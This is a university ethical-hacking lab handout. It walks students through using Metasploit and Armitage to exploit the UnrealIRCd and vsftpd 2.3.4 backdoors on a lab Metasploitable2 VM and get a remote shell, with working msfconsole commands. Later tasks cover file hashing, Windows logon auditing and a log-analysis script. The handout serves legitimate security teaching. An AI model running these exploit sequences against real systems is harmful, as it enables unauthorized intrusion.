CYB-430&530: Ethical Hacking
LAB-06: Metasploit Framework & Host Hardening
1. Lab Overview
In this lab, you will learn how to use Metasploit to gain access to a remote machine. The goal is to teach you the basics of practical penetration testing. The Metasploit Framework (MSF) contains a collection of exploits. It is an infrastructure that can be built upon and adapted to custom needs, which lets you concentrate on setting up your exploitation environment instead of reinventing the wheel. MSF is one of the most popular tools for security professionals conducting practical hacking studies. It contains an extensive set of exploitation tools and working environments. Additionally, it is freely available to the public.
Two Linux virtual machines will be used: one is a Kali Linux VM with the Metasploit Framework installed, and the other is an intentionally vulnerable Linux VM. This lab uses the Metasploit Framework on Kali Linux to remotely gain access to the vulnerable Linux machine.
2. Lab Environment
· The VirtualBox VM Software
https://www.virtualbox.org/wiki/Downloads
· The Kali Linux, Penetration Testing Distribution
https://www.kali.org/downloads/
· Metasploit: Penetration Testing Software
· Metasploitable2: Vulnerable Linux Platform
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
3. Lab Task – 1: Metasploit Framework
Part I: Starting Virtual Machines
Two VMs are needed for this lab: the Kali Linux VM and the Metasploitable2-Linux VM.
Step 1: Start up the Kali Linux VM.
Step 2: Log in to Kali Linux with your username and password. Below is the screen snapshot after login.
Step 3: Then, select Metasploitable2-Linux and press Start. This is an intentionally vulnerable Linux VM to attack against.
Step 4: Log into the virtual machine with the username msfadmin and the password msfadmin.
Step 5: After logging in, the VM should show the screen below.
Part II: Setting up the Environment for Metasploit on Kali Linux
In order to use the Metasploit Framework, first set up the environment in Kali Linux, which includes starting the database it uses.
Step 1: After logging into Kali Linux, open up a terminal by clicking the terminal icon.
Step 2: Metasploit Framework uses PostgreSQL as its database, so you need to launch it by running the following command in the terminal:
$ service postgresql start
Step 3: You can verify that PostgreSQL is running by executing the following command:
$ service postgresql status
Step 4: With PostgreSQL up and running, you need to create and initialize the msf database by executing the following command:
$ msfdb init
The screenshot above shows the command to start a database for Metasploit Framework.
Part III: Starting Metasploit Framework
Step 1: Launch the Metasploit console by clicking on the Metasploit icon or by typing the following command in a terminal.
$ msfconsole
Step 2: Use msfconsole to verify that the database is connected, as shown in the screenshot below.
Step 3: Type help in msf console to get the core and database commands as shown below.
More: https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/
Part IV: Identifying the Attacking Target
For the purpose of this lab, Metasploitable2-Linux is the attack target. First, we need to find the IP address of the target in order to launch a remote exploitation. You can use the command “ifconfig” (ipconfig is the Windows equivalent). This command lists all the connected interfaces and network cards.
Go to the Metasploitable2-Linux VM and execute the following command.
$ ifconfig
From the screenshot above, the IP address of the network interface, eth0, is 172.16.108.172. This is the IP address for the target that you will set later in this lab.
Part V: Identifying the Vulnerabilities on the Target
The target, Metasploitable2-Linux, is an intentionally vulnerable machine. It contains vulnerabilities that could be remotely exploited.
UnrealIRCd IRC Daemon Backdoor
On port 6667, Metasploitable2 runs the UnrealIRCd IRC daemon. This version contains a backdoor that went unnoticed for months; it is triggered by sending the letters "AB" followed by a system command to the server on any listening port. Metasploit has a module to exploit this in order to gain an interactive shell.
Vsftpd v2.3.4 Backdoor
This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. Metasploit can exploit the malicious backdoor that was added to the vsftpd download archive.
There are more vulnerabilities that can be exploited on the target. You can find a list of all the vulnerabilities for Metasploitable2 at the following links:
https://community.rapid7.com/docs/DOC-1875
and
http://chousensha.github.io/blog/2014/06/03/pentest-lab-metasploitable-2/
Part VI: Launching Attacks Using Metasploit Framework
After identifying the target and vulnerabilities, it is now time to launch attacks.
Step 1: Go to Kali Linux, and start the Metasploit console by typing msfconsole in a terminal.
$ msfconsole
Step 2: Set the module you want to use:
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
Step 3: Here, we use the module for exploiting the backdoor in the UnrealIRCd IRC daemon. Then, set the remote host:
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 172.16.108.172
Step 4: The IP address of the Metasploitable2 VM in this lab is 172.16.108.172. Your VMs may have different IP addresses depending on the network configuration. Lastly, type “exploit” to launch the attack.
msf exploit(unreal_ircd_3281_backdoor) > exploit
The screenshot above shows the exploitation process in the Metasploit console. We can see that Metasploit successfully gains a shell session, and we are able to execute the $ whoami and $ uname -a commands to show that we are running on the Metasploitable2 machine from Kali Linux.
Using Vsftpd v2.3.4 Backdoor to Attack
The example above shows that you can remotely gain access to the target Linux machine using the backdoor in the UnrealIRCd IRC daemon. Now, we are going to use another vulnerability of the target machine (i.e., the vsftpd backdoor) to launch an attack. The steps are similar to the previous attack.
$ msfconsole
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > set RHOST 172.16.108.172
msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
msf exploit(vsftpd_234_backdoor) > exploit
$ whoami
$ uname -a
The figure above shows vsftpd backdoor command execution using the Metasploit Framework.
Part VII: Armitage - Cyber Attack Management for Metasploit
If you still struggle with the msfconsole commands, Armitage can help. Armitage is a GUI tool for the Metasploit Framework that makes penetration testing easier.
Step 1: To start Armitage in Kali Linux, just type armitage in a terminal or click the Armitage icon.
Step 2: In the pop-up window, click “Connect” and then “Yes”.
If everything goes well, the Armitage GUI should show up.
Step 3: Click on the “Hosts” tab and then click on “Add Hosts”.
Step 4: In the pop-up Window, type the IP address of the Metasploitable2-Linux machine. Then, click “add”.
Step 5: After adding the Metasploitable2 Linux as a target host, right click the host entry and select “Scan”. This will scan the host and identify its vulnerabilities.
Step 6: Before attacking, choose a weapon. Armitage makes this process easy. Select the “Attacks” tab and then click on “Find Attacks” to generate a custom Attack menu for the host.
Step 7: Next, use the vsftpd backdoor vulnerability mentioned earlier to launch an attack. Right click on the target host and select “Attack” -> “ftp” -> “vsftpd_234_backdoor”.
Step 8: Select “Use a reverse connection” and press “Launch”.
Step 9: The console in Armitage shows the exploitation is successfully launched.
Step 10: Right Click on the host entry and select “Shell 1” -> “Interact”
Step 11: A new tab with the shell will open in the area below. Run the commands “whoami” and “uname -a” to show that the host was successfully exploited.
4. Lab Task – 2: File Integrity in O/S Security
FileVerifier++® is a tool that will compute hashes on any single file, or all of your files at once. These hashes are then checked to see if there have been any changes to those files. FileVerifier++ can quickly check the integrity of a large number of files.
FileVerifier++ is useful if you need to verify that a given set of files has not been changed or altered in any way. For example, it could be used to verify that customer, employee, financial, or sales records were not manipulated. If a file was changed without authorization, it can be compared with an earlier version to determine which changes were made. Using a file verifier is a way IT security professionals can detect a possible intrusion.
1. Download and install FileVerifier++ from http://www.programmingunlimited.net.
2. Click Start Menu and search for FileVerifier++.
3. In FileVerifier, click the Options button.
4. Change the Default Algorithm to MD5.
5. Click OK.
6. Click on the Dirs button to select the directories you want. (You can also select individual files.)
7. Browse to and select your downloads directory.
8. Click OK.
9. Take a screenshot.
10. Click the Verify All button. (Browse to your downloads directory if necessary.)
11. Click OK.
12. Take a screenshot.
13. Create a new text file named YourNameHash.txt, and save it in your downloads folder. (Replace YourName with your first and last names.)
14. Open the text file labeled YourNameHash.txt you just created in your downloads folder.
15. Add your name to the contents of the text file.
16. Save your changes to that text file by clicking File and Save.
17. Close the text file.
18. In the FileVerifier++ window, click Verify All again. (Browse to your downloads folder if necessary.)
19. Scroll down until you can see the text file that you changed. (It should be highlighted in red.)
20. Take a screenshot.
5. Lab Task – 3: Logs Analysis in O/S Security
Good administrators check their logs regularly. They need to know what went on when they were away. They need to look for intruders, compromised machines, stolen or deleted files, and so on. The list of things to look for can be extensive.
Microsoft Windows Event Viewer® is a simple program that organizes these logs in a way that makes them easy to view. Learning how Event Viewer works is a great training platform for beginners. It is also a useful diagnostic tool. In this example, you will enable logging of security events, log in and out of your machine, and then look up the event in Event Viewer.
1. Click on the Windows Start Menu and search for Local Security Policy.
2. Click on Local Policies and Audit Policy.
3. Double-click on the policy labeled “Audit account logon events.”
4. Select both Success and Failure.
5. Click OK.
6. Double-click on the policy labeled “Audit logon events.”
7. Select both Success and Failure.
8. Click OK.
9. Take a screenshot.
10. In the control panel, click System and Security, Administrative Tools, and Event Viewer.
11. Click Windows Logs and Security.
12. Take a screenshot.
13. Log off your computer (you don’t need to shut down) by clicking Start, the drop-down menu next to Shut down, and Log Off.
14. Log onto your computer by clicking your username and entering your password.
15. In the control panel, click System and Security, Administrative Tools, and Event Viewer.
16. Click Windows Logs and Security.
17. Take a screenshot.
18. Double-click on the Logon/Logoff event that was just recorded.
19. Take a screenshot.
20. Click Close.
21. Click Applications and Services Logs and Microsoft Office Sessions.
22. Click on one of the log events.
23. Take a screenshot.
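Once the audit policy from steps 3 to 8 is on, the Security log can also be reviewed programmatically rather than one event at a time. The script below is an added example, not part of the lab: it parses a constructed CSV-style export of logon events (Event IDs 4624 and 4625 and the logon-type numbers are real Windows identifiers, but the entries themselves are made up, with 192.0.2.10 as a documentation-range source address) and counts failures per account and source, flagging a source that fails repeatedly and then succeeds.

```python
import csv
from collections import Counter
from io import StringIO

# Constructed sample in the shape of an Event Viewer CSV export (not real data).
# EventID 4624 = successful logon, 4625 = failed logon.
# LogonType 2 = interactive (console), 3 = network, 10 = remote interactive (RDP).
# SourceIP is "-" for local console logons.
SAMPLE_EVENTS = """\
Time,EventID,Account,LogonType,SourceIP
2024-03-01 08:59:10,4625,msfadmin,3,192.0.2.10
2024-03-01 08:59:12,4625,msfadmin,3,192.0.2.10
2024-03-01 08:59:14,4625,msfadmin,3,192.0.2.10
2024-03-01 08:59:16,4625,msfadmin,3,192.0.2.10
2024-03-01 09:02:30,4624,student,2,-
2024-03-01 09:03:05,4625,student,2,-
2024-03-01 09:03:20,4624,student,2,-
2024-03-01 09:15:00,4624,msfadmin,10,192.0.2.10
"""


def parse_events(text):
    """Read the export into a list of dicts keyed by the header row."""
    return list(csv.DictReader(StringIO(text)))


def failed_logons(events):
    """Count 4625 events per (account, source) so a local typo and remote guessing separate out."""
    counts = Counter()
    for e in events:
        if e["EventID"] == "4625":
            counts[(e["Account"], e["SourceIP"])] += 1
    return counts


def suspicious_sources(events, threshold=3):
    """Flag (account, source) pairs with at least `threshold` failures and a success from the same source."""
    fails = failed_logons(events)
    successes = {(e["Account"], e["SourceIP"]) for e in events if e["EventID"] == "4624"}
    return sorted(key for key, n in fails.items() if n >= threshold and key in successes)


if __name__ == "__main__":
    events = parse_events(SAMPLE_EVENTS)
    for (account, source), n in failed_logons(events).most_common():
        print(f"{n} failed logon(s) for {account} from {source}")
    print("review:", suspicious_sources(events))  # [('msfadmin', '192.0.2.10')]
```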
6. Lab Task – 4: THOUGHT QUESTIONS
1. Will these security logs track failed logon attempts? From remote machines too?
2. Will it track security events other than just logon/logoff events?
3. Can you use Event Viewer to view other logs?
4. Why is there a log that tracks which Microsoft office programs you use and how long you use them?
5. How could a top-notch hacker keep you from knowing which files were changed?
6. Can you calculate a hash for a single file?
7. From the hash could you tell what was changed in the file?
8. Can you use the longest hash possible? How long is good enough?
9. Why do we need to assign an internal IP address (i.e., behind NAT) for Metasploitable2-Linux? What will happen if we assign a public IP to it?
10. Besides the two vulnerabilities we used, exploit another vulnerability using both msfconsole and Armitage. Show that you have placed a file in the exploited remote machine via screenshots and by creating the file with the command “touch ” where should be replaced with your full name.
7. Submission Instructions
1. Complete all the tasks assigned in the lab. Take screenshots of all major steps involved in this lab. Paste the screenshots into an MS-Word file and, if applicable, add the source code of the entire program (not all labs involve code). Name the MS-Word report file in the format “LAB-06-Group_XX”.
2. You are not always required to follow my steps exactly as given; you can come up with your own ideas and your own ways to solve the same problem.
3. Try your best to prepare a well-organized lab report with a step-by-step description for each screenshot.
4. Only one member of each group should submit the lab report to the D2L “LAB-06” drop-box, within one week from the assigned date.
NOTE-1: Please add (1) all group members’ names (LAST_NAME, FIRST_NAME) and (2) page numbers to the report. If you wish, you can create a cover page for each lab, but it is not necessary.
NOTE-2: Please add each group member’s contribution to completing and submitting this lab as a percentage, as shown below, at the end of the report. (Before submitting to D2L, all of the group members must be aware of their reported contribution percentage in the lab report.)
Example:
Member-01: 100%
Member-02: 75%
Member-03: 100%
Member-04: 50%